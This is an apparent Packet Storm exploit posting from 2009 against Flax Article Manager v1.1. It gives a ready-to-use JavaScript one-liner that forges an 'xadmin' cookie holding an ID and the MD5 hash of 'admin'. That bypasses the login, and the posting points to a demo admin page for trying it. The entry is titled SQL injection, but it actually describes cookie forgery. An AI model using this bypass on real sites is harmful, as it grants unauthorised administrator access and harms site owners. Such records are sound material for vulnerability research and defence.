Flax Article Manager 1.1 SQL Injection

2009-05-27T00:00:00
ID PACKETSTORM:77836
Type packetstorm
Reporter TiGeR-Dz
Modified 2009-05-27T00:00:00

Description

                                        
                                            ` ---------------------------------------------------------------  
---------------------------------------------------------------  
Flax Article Manager v1.1 Bypass Cookie SQL Injection Vulnerability  
---------------------------------------------------------------  
Founder : TiGeR-Dz  
Home:www.h4ckf0ru.com  
Script:Flaxweb - Article management system v1.1  
Download:http://www.articlesitedemo.com/  
---------------------------------------------------------------  
Exploit  
-------  
1/ javascript:document.cookie="xadmin=1%2C21232f297a57a5a743894a0e4a801fc3;path=/";  
2/ (1%2C21232f297a57a5a743894a0e4a801fc3) is id and password of login to site :)  
  
----------------------------------------------------------------  
Dem0  
----  
http://www.articlesitedemo.com/admin/admin.php  
--------------------------------------  
  
Greeting To ALL My Friends (Dz)  
  
  
`